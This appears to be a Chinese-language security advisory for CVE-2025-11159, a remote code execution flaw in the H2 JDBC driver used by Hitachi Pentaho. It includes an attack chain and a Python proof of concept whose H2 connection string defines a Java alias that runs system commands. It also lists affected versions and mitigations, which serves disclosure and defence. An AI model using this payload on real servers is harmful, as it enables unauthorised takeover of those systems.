CVE-2025-11159 Hitachi Pentaho远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-11159

漏洞类型

远程代码执行 (RCE)

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Hitachi Vantara Pentaho Data Integration & Analytics

漏洞概述

Hitachi Vantara Pentaho Data Integration & Analytics的所有版本中集成的H2数据库JDBC驱动程序存在严重的安全漏洞。当数据源管理员创建新的数据库连接时，由于驱动程序未对连接参数进行充分验证，攻击者可利用该漏洞在目标服务器上执行任意外部脚本。该漏洞CVSS v3.1评分为9.1，属于严重级别。攻击无需用户交互即可通过网络发起，成功利用后可导致目标系统的机密性、完整性和可用性全面受损，允许攻击者在服务器上下文中执行恶意代码。

技术细节

该漏洞的根源在于Hitachi Vantara Pentaho产品所依赖的H2数据库JDBC驱动程序存在未授权的脚本执行机制。H2数据库支持通过JDBC连接字符串的`INIT`参数执行SQL初始化脚本，或使用`RUNSCRIPT`命令加载远程资源。当拥有数据源管理员权限（PR:H）的攻击者配置或修改数据源连接信息时，若在JDBC URL中注入恶意构造的SQL命令（如`CREATE ALIAS`定义Java函数或调用系统命令），Pentaho在尝试建立新连接时会调用H2驱动解析并执行这些命令。由于应用层缺乏对JDBC URL中危险参数的过滤，攻击者可借此绕过安全限制，在服务器端实现远程代码执行，进而完全控制受影响的服务器。

攻击链分析

STEP 1

侦察

攻击者识别目标系统为Hitachi Vantara Pentaho，并确定其版本在受影响范围内。

STEP 2

获取凭证

攻击者通过钓鱼、暴力破解或其他手段获取具有数据源管理员权限的账号凭证（满足PR:H要求）。

STEP 3

漏洞利用

攻击者使用管理员账户登录，创建或修改数据源配置，将JDBC连接URL设置为包含恶意`INIT`或`RUNSCRIPT`指令的H2连接字符串。

STEP 4

代码执行

Pentaho系统尝试使用恶意URL建立数据库连接。H2驱动解析连接字符串并执行注入的系统命令或脚本（RCE）。

STEP 5

建立立足点

攻击者在服务器上获得反向Shell或执行其他恶意操作，从而完全控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2025-11159: H2 JDBC RCE via Malicious Connection String
# Target: Hitachi Vantara Pentaho Data Integration & Analytics
# Requirement: Data Source Administrator privileges (PR:H)

import requests
import json

target_url = "http://pentaho-target:8080/pentaho/api/repo/datasources/ maliciousDS"

# Malicious JDBC URL using H2's INIT parameter to execute code
# This creates a Java alias to execute system commands
malicious_jdbc_url = "jdbc:h2:mem:testdb;INIT=CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\"); return s.hasNext() ? s.next() : \"\"; }';CALL EXEC('whoami')"

headers = {
    "Content-Type": "application/json"
}

# Payload representing a data source configuration update
payload = {
    "name": "ExploitDS",
    "driverClass": "org.h2.Driver",
    "url": malicious_jdbc_url,
    "username": "sa",
    "password": ""
}

print("[*] Attempting to create malicious data source...")

# The attacker must authenticate as a user with Data Source Admin rights
response = requests.post(target_url, headers=headers, data=json.dumps(payload), auth=("admin", "password"))

if response.status_code == 200 or response.status_code == 201:
    print("[+] Success: Data source created/updated.")
    print("[+] The H2 driver will execute the payload upon connection initialization.")
else:
    print(f"[-] Failed: HTTP {response.status_code}")
    print(response.text)

影响范围

Hitachi Vantara Pentaho Data Integration & Analytics < 10.2.0.7

Hitachi Vantara Pentaho Data Integration & Analytics < 11.0.0.0

防御指南

临时缓解措施

如果无法立即升级，请严格审查所有现有的JDBC数据源连接配置，移除任何包含`INIT=`、`RUNSCRIPT`或非标准参数的连接字符串。同时，应加强对管理员账户的安全审计，确保只有授权人员才能修改数据源配置。此外，可以通过WAF或防火墙规则拦截包含特定H2恶意特征的数据包。